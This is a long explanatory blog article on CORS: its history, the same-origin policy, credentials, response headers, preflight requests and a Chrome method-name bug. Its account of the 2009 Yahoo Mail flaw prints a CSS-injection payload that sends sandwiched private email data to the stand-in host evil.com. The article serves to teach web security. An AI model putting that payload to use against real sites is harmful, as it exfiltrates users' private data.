How to win at CORS

The ‘how’ and ‘why’ of CORS, from start to finish.

CORS is hard. It's hard because it's part of how browsers fetch stuff, and that's a set of behaviours that started with the very first web browser over thirty years ago. Since then, it's been a constant source of development: adding features, improving defaults, and papering over past mistakes without breaking too much of the web.

Anyway, I figured I'd write down pretty much everything I know about CORS, and to make things interactive, I built an exciting new app: the CORS playground.

You can dive right into the playground now if you want, but I'll link to it throughout the article to demonstrate particular examples.

Anyway, I'm getting ahead of myself. Before I get to any of the 'how', I'm going to try to explain why CORS is the way it is, by looking at how it came into existence, and how it fits into other kinds of fetches. Wish me luck…

Cross-origin access without CORS

I’d like to propose a new, optional HTML tag: IMG. Required argument is SRC="url".

Marc Andreessen in 1993

Browsers have been able to include images from other sites for almost 30 years. You don't need the other site's permission to do this, you can just do it. And it didn't stop with images:

<script src=""></script>
<link rel="stylesheet" href="" />
<iframe src=""></iframe>
<video src=""></video>
<audio src=""></audio>

APIs like these let you make a request to another website and process the response in a particular way, without the other site's consent.

This started getting complicated in 1994 with the advent of HTTP cookies. HTTP cookies became part of a set of things we call credentials, which also includes TLS client certificates, and the state that automatically goes in the Authorization request header when using HTTP authentication (if you've never heard of this, don't worry, it's shite).

Credentials mean web content can be tailored for a particular user. It's how Twitter shows you your feed, it's how your bank shows you your accounts.

When you request other-site content using one of the methods above, it sends along the credentials for the other-site. And over the years that's created a colossal sackload of security issues.

<img src="https://your-bank/your-profile/you.jpg" />

If the above image loads, I get a load event. If it doesn't load, I get an error event. If that differs depending on if you're logged in or not, that tells me a lot about you. I can also read the width and height of the image, which, if it differs from user to user, tells me even more.

This gets worse with a format like CSS, which has more capabilities, but doesn't immediately fail on parse errors. In 2009 it turned out Yahoo Mail was vulnerable to a fairly simple exploit. The attacker sends the user one email with a subject including ');}, and later another with a subject including {}html{background:url('//evil.com/?:

<li class="email-subject">Hey {}html{background:url('//evil.com/?</li>
<li class="email-subject">…private data…</li>
<li class="email-subject">…private data…</li>
<li class="email-subject">…private data…</li>
<li class="email-subject">Yo ');}</li>

This means some of the user's private email data is sandwiched between two fragments that, together, will parse as a valid bit of CSS. Then, the attacker convinces the user to visit a page containing:

<link rel="stylesheet" href="https://m.yahoo.com/mail" />

…which is loaded using yahoo.com's cookies, the CSS parses, and sends private information to evil.com. Oh no.

And that's just the tip of the shitberg. From browser bugs to CPU exploits, these leaky resources have given us decades of problems.

Locking things down

It's become pretty clear that the above was a mistake in the design of the web, so we no longer create APIs that can process these kinds of requests. Meanwhile, we've spent the last few decades patching things up as best we can:

  • CSS from another origin (I'll get to a definition of 'origin' shortly) now needs to be sent with a CSS Content-Type. Unfortunately we can't enforce the same thing for scripts and images, or CSS on quirks mode pages, without breaking significant portions of the web. However…
  • We prevent particular response types from another origin being loaded as image/script/etc., such as HTML, JSON, and XML (except SVG). This protection is called CORB.
  • More recently, we don't send cookies along with the request from site-A to site-B, unless site-B has opted-in using the SameSite cookie attribute. Without cookies, the site generally returns the 'logged-out' view, without private data.
  • Firefox and Safari go a step further, and try to fully isolate sites, although how this works is currently pretty different between the two.

The same-origin policy

Back in 1995, Netscape 2 landed with two amazing new features: LiveScript (you probably know this better as 'JavaScript'), and HTML frames. Frames let you embed one page in another, and LiveScript could interact with both pages.

Netscape realised that this presented a security issue; you don't want an evil page to be able to read the DOM of your banking page, so they decided that cross-frame scripting would only be allowed if both pages had the same origin.

In https://jakearchibald.com:443/2021/blah/?foo#bar, the origin is https://jakearchibald.com:443 (the scheme, host, and port).

The idea was that sites on the same origin are more likely to have the same owner. That wasn't completely true, since a lot of sites divided content by URLs such as http://example.com/~jakearchibald/, but the line had to be drawn somewhere.
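
To make the definition concrete, here's a minimal sketch using the standard URL API, which exists in browsers and in Node.js. The sameOrigin helper is a made-up name for illustration, not something the platform provides. Note that the serialised origin drops the port when it's the default for the scheme, so :443 disappears for https.

```javascript
// Hypothetical helper: two URLs share an origin when scheme, host and port match.
function sameOrigin(urlA, urlB) {
  // URL#origin serialises scheme + host + port, omitting default ports
  // (443 for https, 80 for http).
  return new URL(urlA).origin === new URL(urlB).origin;
}

// Path, query and fragment are not part of the origin.
console.log(new URL('https://jakearchibald.com:443/2021/blah/?foo#bar').origin);
// → https://jakearchibald.com

// Same scheme, host and (default) port: same origin.
console.log(sameOrigin('https://jakearchibald.com/a', 'https://jakearchibald.com:443/b'));
// → true

// A different scheme means a different origin.
console.log(sameOrigin('https://jakearchibald.com/', 'http://jakearchibald.com/'));
// → false

// A different subdomain means a different origin too.
console.log(sameOrigin('https://help.yourbank.com/', 'https://profile.yourbank.com/'));
// → false
```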

From that point, features that granted deep visibility into a resource were limited to same-origin. This included new ActiveXObject('Microsoft.XMLHTTP') which first appeared in IE5 in 1999, and later became the web standard XMLHttpRequest.

Origins vs sites

Some web features don't deal with origins, they deal with 'sites'. For instance, https://help.yourbank.com and https://profile.yourbank.com are different origins, but they're the same site. Cookies are the most common feature that operates at a site level, as you can create cookies that are sent to all subdomains of yourbank.com.

But how does the browser know that https://help.yourbank.com and https://profile.yourbank.com are part of the same site, but https://yourbank.co.uk and https://jakearchibald.co.uk are different sites? I mean… they all have three parts separated by dots.

Well, the answer was a bunch of heuristics in each browser, but in 2007 Mozilla swapped their heuristics for a list. That list is now maintained as a separate community project known as the public suffix list, and it's used by all browsers and many other projects.

If someone says they understand the security implications of URLs without UI hints, be sure to check they can recite all 9000+ entries of the public suffix list from memory.

Origin: https://app.jakearchibald.com
Site: jakearchibald.com

Origin: https://other-app.jakearchibald.com
Site: jakearchibald.com

Same origin: no
Same site: yes

The interactive version of the above uses a live version of the public suffix list, but I had to proxy it because the actual list doesn't use CORS. The irony.

So https://app.jakearchibald.com and https://other-app.jakearchibald.com are part of the same site, but https://app.glitch.me and https://other-app.glitch.me are different sites. These cases are different because glitch.me is on the public suffix list whereas jakearchibald.com is not. This is 'correct', because different people 'own' the subdomains of glitch.me, whereas I own all the subdomains of jakearchibald.com.
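
As a rough sketch of that lookup: the site is the longest matching public suffix plus one more label. The SUFFIXES set below is a tiny hand-picked sample, and siteOf and sameSite are hypothetical helper names. The real public suffix list also has wildcard and exception rules, and browsers may take the scheme into account too, none of which is modelled here.

```javascript
// A tiny, hand-picked sample of public suffixes, for illustration only.
const SUFFIXES = new Set(['com', 'me', 'uk', 'co.uk', 'glitch.me']);

// Hypothetical helper: returns the site for a hostname, or null when the
// hostname is itself a public suffix or no suffix in the sample matches.
function siteOf(hostname, suffixes = SUFFIXES) {
  const labels = hostname.toLowerCase().split('.');
  // Try the longest candidate suffix first, then progressively shorter ones.
  for (let i = 0; i < labels.length; i++) {
    const candidate = labels.slice(i).join('.');
    if (suffixes.has(candidate)) {
      if (i === 0) return null; // The whole hostname is a public suffix.
      // Site = the matched suffix plus the label immediately before it.
      return labels.slice(i - 1).join('.');
    }
  }
  return null;
}

// Hypothetical helper: two hostnames are same-site when their sites match.
function sameSite(hostA, hostB) {
  const siteA = siteOf(hostA);
  return siteA !== null && siteA === siteOf(hostB);
}

console.log(siteOf('app.jakearchibald.com')); // → jakearchibald.com
console.log(siteOf('app.glitch.me')); // → app.glitch.me
console.log(sameSite('app.jakearchibald.com', 'other-app.jakearchibald.com')); // → true
console.log(sameSite('app.glitch.me', 'other-app.glitch.me')); // → false
```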

Opening things up again

Ok, so we've got these APIs like <img> that can access resources from other origins, but visibility into the response is limited (but not limited enough in hindsight), and we've got these more powerful APIs like cross-frame scripting and XMLHttpRequest which only work same-origin.

How could we allow those more powerful APIs to work across origins?

Remove credentials?

Let's say we provide an opt-in so the request is sent without credentials. The response will be the 'logged-out' view, so it won't contain any private data, and can be revealed without concern, right?

Unfortunately there're a lot of HTTP endpoints out there that 'secure' themselves using things other than browser credentials.

A lot of company intranets assume they're 'private' because they're only accessible from a particular network. Some routers and IoT devices assume they're only accessible by well-meaning folks because they're restricted to your home network (remember, the 's' in 'IoT' stands for security). Some websites offer different content depending on the IP address they're accessed from.

So, if you visit my website from your home, I could start making requests to common hostnames and IP addresses, looking for insecure IoT devices, looking for routers using default passwords, and generally make your life very miserable, all without needing browser credentials.

Removing credentials is part of the solution, but it isn't enough on its own. There's no way to know that a resource contains private data, so we need some way for the resource to declare "hey, it's fine, let the other site read my content".

Separate resource opt-in?

The origin could have some special resource that details its permissions regarding cross-origin access. That's the security model Flash went with. Flash looked for a /crossdomain.xml in the root of the site that looked like this:

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "https://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only" />
  <allow-access-from domain="*.example.com" />
  <allow-access-from domain="www.example.com" />
  <allow-http-request-headers-from domain="*.adobe.com" headers="SOAPAction" />
</cross-domain-policy>

There are a few issues with this:

  • It changes the behaviour for the whole origin. You can imagine a similar format that lets you specify rules for particular resources, but the resource would start to get quite large.
  • You end up with two requests, one for the /crossdomain.xml, and one for the actual resource. This becomes more of an issue the bigger /crossdomain.xml gets.
  • For larger sites built by multiple teams, you end up with issues over ownership of /crossdomain.xml.

In-resource opt-in?

To cut down the number of requests, the opt-in could be granted within the resource itself. This technique was proposed by the W3C Voice Browser Working Group back in 2005, using an XML processing instruction:

<?access-control allow="*.example.com" deny="*.visitors.example.com"?>

But what if the resource wasn't XML? Well, the opt-in would need to be in a different format.

This is kinda where things landed for frame-to-frame communication. Both sides opt-in using postMessage, and can declare the origin they're happy to communicate with.
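
Here's a minimal sketch of the receiving side of that opt-in. In a page, the handler would be registered with window.addEventListener('message', …), and the sender would name its intended recipient with otherWindow.postMessage(data, targetOrigin). To keep the example runnable anywhere, handleMessage takes a plain object with the same origin and data fields as a MessageEvent. The handler name and the trusted origin are assumptions for illustration.

```javascript
// Assumed value: the one origin this page is happy to hear from.
const TRUSTED_ORIGIN = 'https://app.example.com';

// Hypothetical handler. `event` is anything shaped like a MessageEvent,
// i.e. it has `origin` (the sender's origin) and `data` (the payload).
function handleMessage(event, trustedOrigin = TRUSTED_ORIGIN) {
  // Ignore messages from origins we haven't opted in to.
  if (event.origin !== trustedOrigin) return null;
  return { accepted: true, payload: event.data };
}

console.log(handleMessage({ origin: 'https://app.example.com', data: 'hello' }));
// → { accepted: true, payload: 'hello' }
console.log(handleMessage({ origin: 'https://evil.example', data: 'hello' }));
// → null
```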

But what about accessing the raw bytes of the resource? In that case it doesn't make sense to use resource-specific metadata for the opt-in. And besides, HTTP already has a place for resource metadata…

HTTP header opt-in

The proposal by the Voice Browser Working Group was generalised using HTTP headers, and that became CORS.

Access-Control-Allow-Origin: *

Making a CORS request

Most modern web features require CORS by default, such as fetch(). The exception is modern features that are designed to support older features that don't use CORS, e.g., <link rel="preload">.

Unfortunately there's no easy rule for what does and doesn't require CORS. For example:

<!-- Not a CORS request -->
<script src="https://example.com/script.js"></script>
<!-- CORS request -->
<script type="module" src="https://example.com/script.js"></script>

The best way to figure it out is to try it and look at network DevTools. In Chrome and Firefox, cross-origin requests are sent with a Sec-Fetch-Mode header which will tell you if it's a CORS request or not. At the time of writing, Safari hadn't implemented this.

Try it in the CORS playground – When you make the request, it'll log the headers the server received. If you're using Chrome or Firefox you'll see Sec-Fetch-Mode set to cors in there, along with some other interesting Sec- headers. However, if you make a no-CORS request, Sec-Fetch-Mode will be no-cors.
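
If you'd rather check this from your own server, something like the following sketch would do. It assumes headers is a plain object keyed by lower-cased header names, which is how Node's http module presents request headers. The describeFetchMode name is made up for illustration.

```javascript
// Hypothetical server-side helper: classify a request by its Sec-Fetch-Mode header.
function describeFetchMode(headers) {
  const mode = headers['sec-fetch-mode'];
  // Browsers that don't implement the header simply won't send it.
  if (mode === undefined) return 'unknown (header not sent)';
  if (mode === 'cors') return 'CORS request';
  if (mode === 'no-cors') return 'no-CORS request';
  // Other modes exist too, such as 'navigate' and 'same-origin'.
  return `other mode: ${mode}`;
}

console.log(describeFetchMode({ 'sec-fetch-mode': 'cors' })); // → CORS request
console.log(describeFetchMode({ 'sec-fetch-mode': 'no-cors' })); // → no-CORS request
console.log(describeFetchMode({})); // → unknown (header not sent)
```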

If an HTML element causes a no-CORS fetch, you can use the badly-named crossorigin attribute to switch it to a CORS request.

<img crossorigin src="" />
<script crossorigin src=""></script>
<link crossorigin rel="stylesheet" href="" />
<link crossorigin rel="preload" as="font" href="" />

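When you switch these over to CORS, you get more visibility into the cross-origin resource. For example, an image loaded with CORS can be drawn to a <canvas> and have its pixels read back, which isn't allowed for a no-CORS image.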

With <link rel="preload">, you need to ensure it uses CORS if the eventual request will also use CORS, otherwise it won't match in the preload cache, and you'll end up with two requests.

CORS requests

By default, a cross-origin CORS request is made without credentials. So, no cookies, no client certs, and no automatic Authorization header, and Set-Cookie on the response is ignored. However, same-origin requests include credentials.
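
In fetch() terms, that default is the credentials option's 'same-origin' value. The sketch below models how the three values of that option decide whether credentials go along with a request. The sendsCredentials helper is a hypothetical name, and it only models the rule described here, not cookie-level rules such as SameSite.

```javascript
// Hypothetical helper modelling fetch()'s `credentials` option.
// 'same-origin' is the default value of that option.
function sendsCredentials(pageUrl, requestUrl, credentials = 'same-origin') {
  if (credentials === 'omit') return false; // never send credentials
  if (credentials === 'include') return true; // send them, even cross-origin
  // 'same-origin': only when the request stays on the page's own origin.
  return new URL(pageUrl).origin === new URL(requestUrl).origin;
}

const page = 'https://app.example.com/index.html'; // assumed page URL

console.log(sendsCredentials(page, 'https://api.example.com/data')); // → false
console.log(sendsCredentials(page, 'https://app.example.com/data')); // → true
console.log(sendsCredentials(page, 'https://api.example.com/data', 'include')); // → true
console.log(sendsCredentials(page, 'https://app.example.com/data', 'omit')); // → false
```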

By the time CORS was developed, the Referer header was frequently spoofed or removed by browser extensions, so a new header, Origin, was created, which provides the origin of the page that made the request.

Origin is generally useful, so it's been added to lots of other types of request, such as WebSocket and POST requests. Browsers tried adding it to regular GET requests too, but it broke a bunch of sites that assumed the presence of the Origin header means it's a CORS request 😬. Maybe one day.

Try it in the CORS playground – When you make the request, it'll log the headers the server received, which will include Origin. If you make a no-CORS GET request, the Origin header isn't sent, but it appears again if you make a no-CORS POST request.

CORS responses

To pass the CORS check and give the other origin access to the response, the response must include this header:

Access-Control-Allow-Origin: *

The * can be replaced with the value of the request's Origin header, but * works for any requesting origin provided the request is sent without credentials (more on that in a bit). As with all headers, the header name is case-insensitive, but the value is case-sensitive.
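
For requests sent without credentials, the check boils down to something like this sketch. It's a simplified model rather than the browser's actual implementation, and passesCorsCheck is a hypothetical name. The allowOrigin argument stands for the value of the response's Access-Control-Allow-Origin header, or undefined if the header is missing.

```javascript
// Simplified model of the CORS check for a request made WITHOUT credentials.
function passesCorsCheck(requestOrigin, allowOrigin) {
  // No header means no opt-in.
  if (allowOrigin === undefined) return false;
  // '*' allows any requesting origin (for requests without credentials).
  if (allowOrigin === '*') return true;
  // Otherwise the value must match the request's Origin exactly;
  // the comparison is case-sensitive.
  return allowOrigin === requestOrigin;
}

const origin = 'https://app.example.com'; // assumed requesting origin

console.log(passesCorsCheck(origin, '*')); // → true
console.log(passesCorsCheck(origin, 'https://app.example.com')); // → true
console.log(passesCorsCheck(origin, 'https://APP.example.com')); // → false
console.log(passesCorsCheck(origin, 'https://other.example.com')); // → false
console.log(passesCorsCheck(origin, undefined)); // → false
```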

A valid value gives the other origin access to the response body, and also a subset of the headers:

  • Cache-Control
  • Content-Language
  • Content-Length
  • Content-Type
  • Expires
  • Last-Modified
  • Pragma

The response can include another header, Access-Control-Expose-Headers, to reveal additional headers:

Access-Control-Expose-Headers: Custom-Header-1, Custom-Header-2

The matching is case-insensitive since header names are case-insensitive. You can also use:

Access-Control-Expose-Headers: *

…to expose (almost) all the headers, if the request is sent without credentials (more on that in a bit).

The Set-Cookie and Set-Cookie2 (a deprecated failed 'sequel' to Set-Cookie) headers are never exposed to avoid leaking cookies across sites.
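
Putting those rules together, here's a sketch of which response headers end up readable by the other origin. It assumes responseHeaders is a plain object keyed by lower-cased header names, and visibleHeaders is a made-up helper name. The default list used here is the Fetch spec's safelist, which also includes Content-Length.

```javascript
// Header names that are readable by default once the CORS check passes.
const SAFELIST = [
  'cache-control', 'content-language', 'content-length', 'content-type',
  'expires', 'last-modified', 'pragma',
];
// Header names that are never exposed, whatever the server says.
const NEVER_EXPOSED = ['set-cookie', 'set-cookie2'];

// Hypothetical helper: returns only the headers the other origin may read.
function visibleHeaders(responseHeaders, withCredentials = false) {
  const expose = (responseHeaders['access-control-expose-headers'] || '')
    .split(',')
    .map((name) => name.trim().toLowerCase()) // names match case-insensitively
    .filter(Boolean);
  // '*' only acts as a wildcard when the request was sent without credentials.
  const exposeAll = !withCredentials && expose.includes('*');

  const visible = {};
  for (const [name, value] of Object.entries(responseHeaders)) {
    if (NEVER_EXPOSED.includes(name)) continue;
    if (exposeAll || SAFELIST.includes(name) || expose.includes(name)) {
      visible[name] = value;
    }
  }
  return visible;
}

const example = {
  'content-type': 'text/plain',
  'custom-header-1': 'a',
  'x-secret': 'b',
  'set-cookie': 'id=1',
  'access-control-expose-headers': 'Custom-Header-1',
};
console.log(Object.keys(visibleHeaders(example)));
// → [ 'content-type', 'custom-header-1' ]
```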

Is it safe to expose resources via CORS?

Access-Control-Allow-Origin: * only grants response visibility if the request is made without credentials, so it's totally safe to use on all resources unless that resource contains private data that's 'secured' using something other than browser credentials.

If you are securing things using something other than browser credentials, stop doing that. It's not actually secure. Platform apps will be able to get at that data and send it wherever they want.

Open the resource in an incognito/private browser tab. Are you happy with other sites having access to that, including the source and the response headers listed above? Then it's safe to expose it via CORS.

Adding credentials

Cross-origin CORS requests are made without credentials by default. However, various APIs will allow you to add the credentials back in.

With fetch:

const response = await fetch(url, {
  credentials: 'include',
});

Or with HTML elements:

<img crossorigin="use-credentials" src="" />

However, this makes the opt-in stronger. The response must contain:

Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://jakearchibald.com
Vary: Cookie, Origin

If the CORS request includes credentials, the response must include the Access-Control-Allow-Credentials: true header, and the value of Access-Control-Allow-Origin must reflect the request's Origin header (* isn't an acceptable value if the request has credentials).
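
On the server, that usually means checking the request's Origin against a list of origins you trust, and reflecting it back only if it's on the list. Here's one way that might look. The TRUSTED_ORIGINS set and the credentialedCorsHeaders name are assumptions for illustration, and wiring the result into a real server is left out.

```javascript
// Assumed allowlist of origins trusted with credentialed access.
const TRUSTED_ORIGINS = new Set(['https://jakearchibald.com']);

// Hypothetical helper: returns the headers to add to the response for a
// request whose Origin header is `requestOrigin` (undefined if not sent).
function credentialedCorsHeaders(requestOrigin, trusted = TRUSTED_ORIGINS) {
  // Vary is set either way, because the response differs by Cookie and Origin.
  const headers = { Vary: 'Cookie, Origin' };
  if (requestOrigin !== undefined && trusted.has(requestOrigin)) {
    // Reflect the exact origin; '*' isn't acceptable with credentials.
    headers['Access-Control-Allow-Origin'] = requestOrigin;
    headers['Access-Control-Allow-Credentials'] = 'true';
  }
  // Untrusted origins get no opt-in headers, so the browser's CORS check fails.
  return headers;
}

console.log(credentialedCorsHeaders('https://jakearchibald.com'));
console.log(credentialedCorsHeaders('https://evil.example'));
```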

The opt-in is stronger because, well, exposing private data is risky, and should only be done for origins you really trust.

The same-site rules around cookies still apply, as do the kinds of isolation we see in Firefox and Safari. But these only come into effect cross-site, not cross-origin.

Try it in the CORS playground – This request meets all the criteria, and also sets a cookie. If you make the request a second time, you'll see the cookie being sent back.

Why Vary?

Vary: Cookie, Origin

It's important to use the Vary header if your response is cacheable in any way. And not just by the browser, but also intermediate things like a CDN. Use Vary to tell browsers and intermediates that the response is different depending on particular request headers.

Although the Origin request header doesn't result in a different response body, it does change the response headers (Access-Control-Allow-Origin in this case), so it needs to go in Vary.
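
To see why this matters, here's a deliberately simplified model of a cache that builds its key from the URL plus whichever request headers Vary names. Real caches are more involved than this, and cacheKey is a hypothetical helper. It assumes requestHeaders is a plain object keyed by lower-cased header names.

```javascript
// Hypothetical helper: build a cache key from the URL and the request
// headers listed in the response's Vary header.
function cacheKey(url, requestHeaders, varyHeader = '') {
  const names = varyHeader
    .split(',')
    .map((name) => name.trim().toLowerCase())
    .filter(Boolean)
    .sort(); // stable order, so 'Cookie, Origin' and 'Origin, Cookie' agree
  const parts = names.map((name) => `${name}=${requestHeaders[name] ?? ''}`);
  return [url, ...parts].join('|');
}

const url = 'https://api.example.com/data'; // assumed URL
const fromA = { origin: 'https://a.example' };
const fromB = { origin: 'https://b.example' };

// Without Vary, both origins share one cache entry, so origin B could be
// handed a response carrying Access-Control-Allow-Origin for origin A.
console.log(cacheKey(url, fromA) === cacheKey(url, fromB)); // → true

// With Vary: Origin, each origin gets its own entry.
console.log(cacheKey(url, fromA, 'Origin') === cacheKey(url, fromB, 'Origin')); // → false
```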

Unusual requests and preflights

So far, the response has been opting into exposing its data. All of the requests have been assumed to be safe, because they're not doing anything unusual.

fetch(url, { credentials: 'include' });

There's nothing unusual about the above, because the request is really similar to what an <img> can do already.

fetch(url, {
  method: 'POST',
  body: formData,
});

There's nothing unusual about the above, because the request is really similar to what a <form> can already do.

fetch(url, {
  method: 'wibbley-wobbley',
  credentials: 'include',
  headers: {
    fancy: 'headers',
    'here-we': 'go',
  },
});

Ok, that's pretty unusual.

What counts as 'unusual' is pretty complicated, but at a high level, if it's the kind of request that other browser APIs don't generally make, then it's unusual. At a lower level, if the request method isn't GET, HEAD, or POST, or it includes headers or header values that aren't part of the safelist, then it counts as unusual. In fact, I made a change to this part of the spec recently to add particular Range headers to this list.

If you try to make an unusual request, the browser first asks the other origin if it's ok to send it. This process is called a preflight.
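
As a rough approximation of the 'unusual' test, the sketch below checks the method and the header names against the safelists. It's intentionally incomplete: the real rules also restrict header values and lengths, and the Range exception isn't modelled. The needsPreflight name is made up for illustration.

```javascript
const USUAL_METHODS = ['GET', 'HEAD', 'POST'];
const USUAL_HEADERS = ['accept', 'accept-language', 'content-language', 'content-type'];
// Content-Type only counts as usual with the media types a <form> can send.
const USUAL_CONTENT_TYPES = [
  'application/x-www-form-urlencoded',
  'multipart/form-data',
  'text/plain',
];

// Hypothetical helper: does this request need a preflight?
// Note that `credentials` plays no part in the decision.
function needsPreflight({ method = 'GET', headers = {} } = {}) {
  if (!USUAL_METHODS.includes(method.toUpperCase())) return true;
  for (const [name, value] of Object.entries(headers)) {
    const lower = name.toLowerCase();
    if (!USUAL_HEADERS.includes(lower)) return true;
    if (lower === 'content-type') {
      // Only the media type matters; parameters like charset are ignored.
      const type = value.split(';')[0].trim().toLowerCase();
      if (!USUAL_CONTENT_TYPES.includes(type)) return true;
    }
  }
  return false;
}

console.log(needsPreflight({ method: 'POST' })); // → false
console.log(needsPreflight({ method: 'wibbley-wobbley' })); // → true
console.log(needsPreflight({ headers: { fancy: 'headers' } })); // → true
console.log(needsPreflight({ method: 'POST', headers: { 'Content-Type': 'application/json' } }));
// → true
```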

Preflight request

Before making the main request, the browser makes a preflight request to the destination URL with a method of OPTIONS, and headers like this:

Access-Control-Request-Method: wibbley-wobbley
Access-Control-Request-Headers: fancy, here-we

  • Access-Control-Request-Method – The HTTP method that the main request will use. This is included even if the method isn't unusual.
  • Access-Control-Request-Headers – The unusual headers that the main request will use. If there are no unusual headers, this header isn't sent.

The preflight request never includes credentials, even if the main request will.

Preflight response

The server responds to indicate whether it's happy for the main request to go ahead, using headers like this:

Access-Control-Max-Age: 600
Access-Control-Allow-Methods: wibbley-wobbley
Access-Control-Allow-Headers: fancy, here-we

  • Access-Control-Max-Age – The number of seconds to cache this preflight response, to avoid the need for further preflights to this URL. The default is 5 seconds. Some browsers have an upper limit on this. In Chrome it's 7200 (2 hours), and in Firefox it's 86400 (24 hours).
  • Access-Control-Allow-Methods – The unusual methods to allow. This can be a comma-separated list, and values are case-sensitive. If the main request is to be sent without credentials, this can be * to allow any method. You can't allow CONNECT, TRACE, or TRACK as these are on a 🔥💀 FORBIDDEN LIST 💀🔥 for security reasons.
  • Access-Control-Allow-Headers – The unusual headers to allow. This can be a comma-separated list, and values are case-insensitive since header names are case-insensitive. If the main request is to be sent without credentials, this can be * to allow any header that isn't on a 🔥💀 DIFFERENT FORBIDDEN LIST 💀🔥.

Headers in the 🔥💀 FORBIDDEN LIST 💀🔥 are headers that must remain in the browser's control for security reasons. They're automatically (and silently) stripped from CORS requests and Access-Control-Allow-Headers.

The preflight response must also pass a regular CORS check, so it needs Access-Control-Allow-Origin, and also Access-Control-Allow-Credentials: true if the main request is to be sent with credentials.

If the intended method is allowed, and all the intended headers are allowed, then the main request goes ahead.

Oh, and the preflight only gives the go-ahead for the request. The eventual response must also pass a CORS check.
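
The method and header part of that decision can be sketched like this. It's a simplified model: it leaves out the CORS check on the preflight response itself, and both forbidden lists. The preflightAllows and parseList names are hypothetical, and preflightHeaders is assumed to be a plain object keyed by lower-cased header names.

```javascript
// Split a comma-separated header value into trimmed items.
function parseList(value = '') {
  return value.split(',').map((item) => item.trim()).filter(Boolean);
}

// Hypothetical helper: does the preflight response allow the main request?
// `request` describes the main request: its method, its unusual header
// names, and whether it will be sent with credentials.
function preflightAllows(preflightHeaders, { method, unusualHeaders = [], withCredentials = false }) {
  const allowedMethods = parseList(preflightHeaders['access-control-allow-methods']);
  const allowedHeaders = parseList(preflightHeaders['access-control-allow-headers'])
    .map((name) => name.toLowerCase());
  // '*' only acts as a wildcard when the main request has no credentials.
  const wildcardOk = !withCredentials;

  const methodOk =
    ['GET', 'HEAD', 'POST'].includes(method) || // usual methods need no listing
    allowedMethods.includes(method) || // method values are case-sensitive
    (wildcardOk && allowedMethods.includes('*'));

  const headersOk = unusualHeaders.every(
    (name) =>
      allowedHeaders.includes(name.toLowerCase()) || // names are case-insensitive
      (wildcardOk && allowedHeaders.includes('*'))
  );

  return methodOk && headersOk;
}

const response = {
  'access-control-allow-methods': 'wibbley-wobbley',
  'access-control-allow-headers': 'fancy, here-we',
};
console.log(preflightAllows(response, {
  method: 'wibbley-wobbley',
  unusualHeaders: ['fancy', 'here-we'],
  withCredentials: true,
}));
// → true
```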

There's a Chrome bug with method names

Chrome has a bug here that I didn't know about until writing this post.

HTTP method names are somewhat case sensitive. I say 'somewhat' because if you use a method name that's a case-insensitive match for get, post, head, delete, options, or put then it's automatically uppercased, but other methods maintain the casing you use.

Unfortunately, Chrome expects the value to be uppercased in Access-Control-Allow-Methods. If your method is Wibbley-Wobbley and the preflight responds with:

Access-Control-Allow-Methods: Wibbley-Wobbley

…it'll fail the check in Chrome. Whereas:

Access-Control-Allow-Methods: WIBBLEY-WOBBLEY

…will pass the check in Chrome (and it'll make the request with the Wibbley-Wobbley method), but it'll fail in other browsers which are following the spec. To work around it, you can provide both methods:

Access-Control-Allow-Methods: Wibbley-Wobbley, WIBBLEY-WOBBLEY

…or just use * if it's a request without credentials.
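
For reference, the 'somewhat case sensitive' rule described above (the normal behaviour, not the Chrome bug) can be sketched as follows. The normalizeMethod name is made up for illustration.

```javascript
// Methods that get uppercased when matched case-insensitively.
const NORMALIZED_METHODS = ['DELETE', 'GET', 'HEAD', 'OPTIONS', 'POST', 'PUT'];

// Hypothetical helper: apply the casing rule to a method name.
function normalizeMethod(method) {
  const upper = method.toUpperCase();
  // Only the methods in the list are uppercased; anything else keeps
  // the casing it was given.
  return NORMALIZED_METHODS.includes(upper) ? upper : method;
}

console.log(normalizeMethod('post')); // → POST
console.log(normalizeMethod('Delete')); // → DELETE
console.log(normalizeMethod('Wibbley-Wobbley')); // → Wibbley-Wobbley
console.log(normalizeMethod('patch')); // → patch
```

The last line is worth noticing: patch isn't on the list, so it isn't uppercased for you.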

Ok, let's put all of that together, for one last time, in the CORS playground:

  • A simple request. This doesn't require a preflight.
  • An unusual header. This triggers a preflight, and the server doesn't allow the request. I'm using status code 405 here which means "method not allowed", but the code you use doesn't actually matter.
  • An unusual header, again, but this time the preflight is correctly configured, so the request goes through.
  • A normal Range header. This relates to the spec change I made. When browsers implement the change, this request won't need a preflight. It's currently implemented in Chrome Canary.
  • An unusual method. This highlights the Chrome bug documented above. The request won't go through in Chrome, but it'll work in other browsers.
  • An unusual method, again. This works around the Chrome bug.

Phew!

Whoa, you made it to the end! Sorry, this post ended up way longer than I intended, but I hope it helps make sense of the whole CORS thing.

A huge thanks to Anne van Kesteren, Simon Pieters, Thomas Steiner, Ethan, and Matt Hobbs for proof-reading, fact-checking, and spotting bits that needed more detail.


Jake Archibald's blog | Sciencx (2024-03-29T04:59:23+00:00) » How to win at CORS. Retrieved from https://www.scien.cx/2021/10/12/how-to-win-at-cors/.